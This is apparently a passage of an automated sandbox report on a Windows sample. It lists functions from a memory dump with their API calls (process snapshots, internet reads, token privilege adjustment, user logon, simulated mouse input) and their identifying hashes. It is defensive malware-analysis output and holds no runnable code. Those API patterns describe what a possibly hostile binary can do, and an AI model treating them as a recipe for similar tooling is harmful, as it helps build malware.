                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                            • String ID:
                                                                            • API String ID: 2576544623-0
                                                                            • Opcode ID: d03b89acaf2481e35c9223dfa2c8ea4079cbebbacf12e59f0ba25d7e96b44564
                                                                            • Instruction ID: f6b2650bd595956b1dd550f621cf67e82b2882e659325a4047cea71c751aec4e
                                                                            • Opcode Fuzzy Hash: d03b89acaf2481e35c9223dfa2c8ea4079cbebbacf12e59f0ba25d7e96b44564
                                                                            • Instruction Fuzzy Hash: F2516B715047119FD350EF28DC85A6BBBE8FF98710F10492DF995D62A2EB70E904CB92
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0085E628
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen
                                                                            • String ID: ($|
                                                                            • API String ID: 1659193697-1631851259
                                                                            • Opcode ID: 6e0658822e7ac3517855d21b712f28fa0b0bc14d05e24da79ae5aaeddaf4abd2
                                                                            • Instruction ID: 3f285f32020cd43c63ccb44c8bab95b05e08a124c9a88e7d8130aab3c81e2937
                                                                            • Opcode Fuzzy Hash: 6e0658822e7ac3517855d21b712f28fa0b0bc14d05e24da79ae5aaeddaf4abd2
                                                                            • Instruction Fuzzy Hash: 3D322675A007059FDB28CF29C48196AB7F1FF58320B15C56EE89ADB3A1E770EA45CB40
                                                                            APIs
                                                                            • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0087180A,00000000), ref: 008723E1
                                                                            • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00872418
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Internet$AvailableDataFileQueryRead
                                                                            • String ID:
                                                                            • API String ID: 599397726-0
                                                                            • Opcode ID: fa7513bad64150400e265f415c8435a8f0b333925a0b41c44befc9f86d1ad2bd
                                                                            • Instruction ID: 043a9ae06a7918d7c3b1852f0a0613ee47eeb9e2d87b071b64a9b242e96a8eef
                                                                            • Opcode Fuzzy Hash: fa7513bad64150400e265f415c8435a8f0b333925a0b41c44befc9f86d1ad2bd
                                                                            • Instruction Fuzzy Hash: DE41F571904209BFEB20DE99DC81EBBB7BCFB40328F10806AF609E6255DA75DE419664
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0086B40B
                                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0086B465
                                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0086B4B2
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$DiskFreeSpace
                                                                            • String ID:
                                                                            • API String ID: 1682464887-0
                                                                            • Opcode ID: 9d96effbda64b812d172c3788171de8db369491e15ac66b1dedc53bb6c0aa663
                                                                            • Instruction ID: 05be865196f355cb29ff96d233350778810c8c344070a2695ca76b561c61fc14
                                                                            • Opcode Fuzzy Hash: 9d96effbda64b812d172c3788171de8db369491e15ac66b1dedc53bb6c0aa663
                                                                            • Instruction Fuzzy Hash: 0A217175A00108EFCB00EFA9DC85AEDBBB8FF49314F1480A9E945EB352DB319955CB51
                                                                            APIs
                                                                              • Part of subcall function 00820DB6: std::exception::exception.LIBCMT ref: 00820DEC
                                                                              • Part of subcall function 00820DB6: __CxxThrowException@8.LIBCMT ref: 00820E01
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0085882B
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00858858
                                                                            • GetLastError.KERNEL32 ref: 00858865
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                            • String ID:
                                                                            • API String ID: 1922334811-0
                                                                            • Opcode ID: ce22a4313577101a4b63dedb25bb0e2aad6b62db7bc00b288944ce645c84a3b5
                                                                            • Instruction ID: 48760da86bb1e51a9b2fc0d94d90fb6f72c58a7cccda2386822a6aba68b98c43
                                                                            • Opcode Fuzzy Hash: ce22a4313577101a4b63dedb25bb0e2aad6b62db7bc00b288944ce645c84a3b5
                                                                            • Instruction Fuzzy Hash: D5118FB2414205AFE718DFA8EC85D6BB7F8FB44715B20852EF855D7252EB30BC448B60
                                                                            APIs
                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00858774
                                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0085878B
                                                                            • FreeSid.ADVAPI32(?), ref: 0085879B
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                            • String ID:
                                                                            • API String ID: 3429775523-0
                                                                            • Opcode ID: cf7d473e22800c15c01b01bb9e430e523f458dfd94e7f3bb5072bab14546fe4d
                                                                            • Instruction ID: 735381fe3e19db2bd4a39814413a4d2b5ea68af15b1f0cdd71845c96c863a654
                                                                            • Opcode Fuzzy Hash: cf7d473e22800c15c01b01bb9e430e523f458dfd94e7f3bb5072bab14546fe4d
                                                                            • Instruction Fuzzy Hash: D6F04975A1130CBFDF00DFF4DC89AAEBBBCFF08201F1044A9AA01E2182E7756A048B50
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0086C6FB
                                                                            • FindClose.KERNEL32(00000000), ref: 0086C72B
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Find$CloseFileFirst
                                                                            • String ID:
                                                                            • API String ID: 2295610775-0
                                                                            • Opcode ID: a0528a9ddfe1709863ae602b1bf0c612ff381000ebd44eda423d5ca5491b9b67
                                                                            • Instruction ID: 8a0fdc4a2634ef14930bf6fad4660c25e8ce148b992101675bdb3ca9208c939d
                                                                            • Opcode Fuzzy Hash: a0528a9ddfe1709863ae602b1bf0c612ff381000ebd44eda423d5ca5491b9b67
                                                                            • Instruction Fuzzy Hash: 26113C726006049FDB109F29D845A2AB7E9FF85325F018529F9A9D7391DB30A805CB81
                                                                            APIs
                                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00879468,?,0088FB84,?), ref: 0086A097
                                                                            • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00879468,?,0088FB84,?), ref: 0086A0A9
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFormatLastMessage
                                                                            • String ID:
                                                                            • API String ID: 3479602957-0
                                                                            • Opcode ID: a079448e60c987cd6c395aac040bef9435699a1abe44beb3f1fb02e6b65af09f
                                                                            • Instruction ID: bf23352285aeedae19341d3ac168ba832aae1a00b7f97b9f777e8d2c79c315a7
                                                                            • Opcode Fuzzy Hash: a079448e60c987cd6c395aac040bef9435699a1abe44beb3f1fb02e6b65af09f
                                                                            • Instruction Fuzzy Hash: A4F0823555522DABDB21AFA8CC48FEA776CFF09761F004165FA09D6182DA309940CBA2
                                                                            APIs
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00858309), ref: 008581E0
                                                                            • CloseHandle.KERNEL32(?,?,00858309), ref: 008581F2
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                                            • String ID:
                                                                            • API String ID: 81990902-0
                                                                            • Opcode ID: 0af1a238b4781db906ed76c4d43f0680cb05490c219ec456145e60af9b5a579e
                                                                            • Instruction ID: 7246456f56c7654db3182e62f1818a07d89c254dfbe82a209bf271ceefde72a6
                                                                            • Opcode Fuzzy Hash: 0af1a238b4781db906ed76c4d43f0680cb05490c219ec456145e60af9b5a579e
                                                                            • Instruction Fuzzy Hash: 8EE0BF75010511AFE7252B65FC05D777BA9FB04311715882AB955C4471DB615CD1DB10
                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00828D57,?,?,?,00000001), ref: 0082A15A
                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0082A163
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled
                                                                            • String ID:
                                                                            • API String ID: 3192549508-0
                                                                            • Opcode ID: 1865c2b6b6885eeb055e851f0a0b15573c89aba65cde44db68e6a83db117d6b0
                                                                            • Instruction ID: 1ddf9d8b1f0b6efeb0859587e566aad4cabbdd8946e2e9b3438547630ee469bc
                                                                            • Opcode Fuzzy Hash: 1865c2b6b6885eeb055e851f0a0b15573c89aba65cde44db68e6a83db117d6b0
                                                                            • Instruction Fuzzy Hash: 0FB09231254308ABCA002B99EC09B883F68FB46AA2F404020F70D84262CB6258508B91
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b5e6fa977b3c55e02b052f4dc7bf88585d3aaec2e3c7cd5b7484c6bb752e348a
                                                                            • Instruction ID: 6607cb48d4bb659cfdb11a188b8d8209c6c79a682c5c41722e45dba70d98f236
                                                                            • Opcode Fuzzy Hash: b5e6fa977b3c55e02b052f4dc7bf88585d3aaec2e3c7cd5b7484c6bb752e348a
                                                                            • Instruction Fuzzy Hash: 6932E221D29F554DD723A634D822335A698FFB73D4F19D737E81AB5AA6EB28C4C38100
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 045992c5ddb4c489394dcc3c6b0f9803a1318a603a457f05ce1cf5c95c477505
                                                                            • Instruction ID: 3c107766d4235aa3cd09100f4566fba753122c16381995604576549c6e207ce1
                                                                            • Opcode Fuzzy Hash: 045992c5ddb4c489394dcc3c6b0f9803a1318a603a457f05ce1cf5c95c477505
                                                                            • Instruction Fuzzy Hash: C3B1F020E2AF414DD723A6398831336BA5CBFBB2C5F55D71BFC1670E22EB2185835181
                                                                            APIs
                                                                            • __time64.LIBCMT ref: 0086889B
                                                                              • Part of subcall function 0082520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00868F6E,00000000,?,?,?,?,0086911F,00000000,?), ref: 00825213
                                                                              • Part of subcall function 0082520A: __aulldiv.LIBCMT ref: 00825233
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Time$FileSystem__aulldiv__time64
                                                                            • String ID:
                                                                            • API String ID: 2893107130-0
                                                                            • Opcode ID: 0608a9b21673d2f17a13338c98272b1d03c722053b041199a426bf82ef6a3dc0
                                                                            • Instruction ID: ed7dcae31f2043c1f7f73f4361685b986e75d8a806930d1171a8d63bd80bf30a
                                                                            • Opcode Fuzzy Hash: 0608a9b21673d2f17a13338c98272b1d03c722053b041199a426bf82ef6a3dc0
                                                                            • Instruction Fuzzy Hash: 0F21AF32625610CFC729CF29D841A52B3E1FBA5311B698F7CE1F9CB2C0DA34A905CB54
                                                                            APIs
                                                                            • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00864C4A
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: mouse_event
                                                                            • String ID:
                                                                            • API String ID: 2434400541-0
                                                                            • Opcode ID: 72eb8a874eaa405adbc72b33772909a568846916b339fa123b2b5009577506a7
                                                                            • Instruction ID: 203e22816018c36c9d3bd56c77e7fed7c62d6c8ee19f8aa487ed7423b70661f6
                                                                            • Opcode Fuzzy Hash: 72eb8a874eaa405adbc72b33772909a568846916b339fa123b2b5009577506a7
                                                                            • Instruction Fuzzy Hash: 7AD09EA516561D79ED1C07649E1FFBE1148F341796FD6B1497601CA2C2ECA05C446131
                                                                            APIs
                                                                            • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00858389), ref: 008587D1
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: LogonUser
                                                                            • String ID:
                                                                            • API String ID: 1244722697-0
                                                                            • Opcode ID: cb4fba25d262f14e35f2ff430f050166e3f29d71a2c2d48912ad7499f618ab1e
                                                                            • Instruction ID: 872724b527e7c508dad6b61d5b21434030b5b07a853e0a4a696d755161bebbe9
                                                                            • Opcode Fuzzy Hash: cb4fba25d262f14e35f2ff430f050166e3f29d71a2c2d48912ad7499f618ab1e
                                                                            • Instruction Fuzzy Hash: 9AD09E3226490EAFEF019EA8DD05EAE3B69FB04B01F408511FE15D51A1C775D935AB60
                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0082A12A
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled
                                                                            • String ID:
                                                                            • API String ID: 3192549508-0
                                                                            • Opcode ID: 97be839f424218e1c5c5697cf51a1c44676807e49b7681417ca2770efe9fe015
                                                                            • Instruction ID: da90b7ffd56ed18129fa560e5e5cdae7a42c1aaa3bcc267af6b2aaa776e17240
                                                                            • Opcode Fuzzy Hash: 97be839f424218e1c5c5697cf51a1c44676807e49b7681417ca2770efe9fe015
                                                                            • Instruction Fuzzy Hash: 48A0113000020CAB8A002B8AEC08888BFACEA022A0B008020FA0C802228B32A8208B80
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a4f7c1f7b2e5de85e70df3942a08eccc2ba1a15d657bf5ea74e98e247c05dcb8
                                                                            • Instruction ID: 45d18ce5f16396cb5c5d947efa14de7ae5c7ecc4b82ee05a821c0a648e9e7a3a
                                                                            • Opcode Fuzzy Hash: a4f7c1f7b2e5de85e70df3942a08eccc2ba1a15d657bf5ea74e98e247c05dcb8
                                                                            • Instruction Fuzzy Hash: 83224630A0451ACBDF388B28C4A67FC7BA5FF01359F28816AD946CB592DB749DC5C742
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                            • Instruction ID: eaacf1e410b5ce23c5026f84466e5de60622095387f9b9fe8f19119b298087ea
                                                                            • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                            • Instruction Fuzzy Hash: 36C187322051B349DF6D8639A43803EFAA1FEA27B131A076DD4B3DB1D4EE14D9A5D720
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
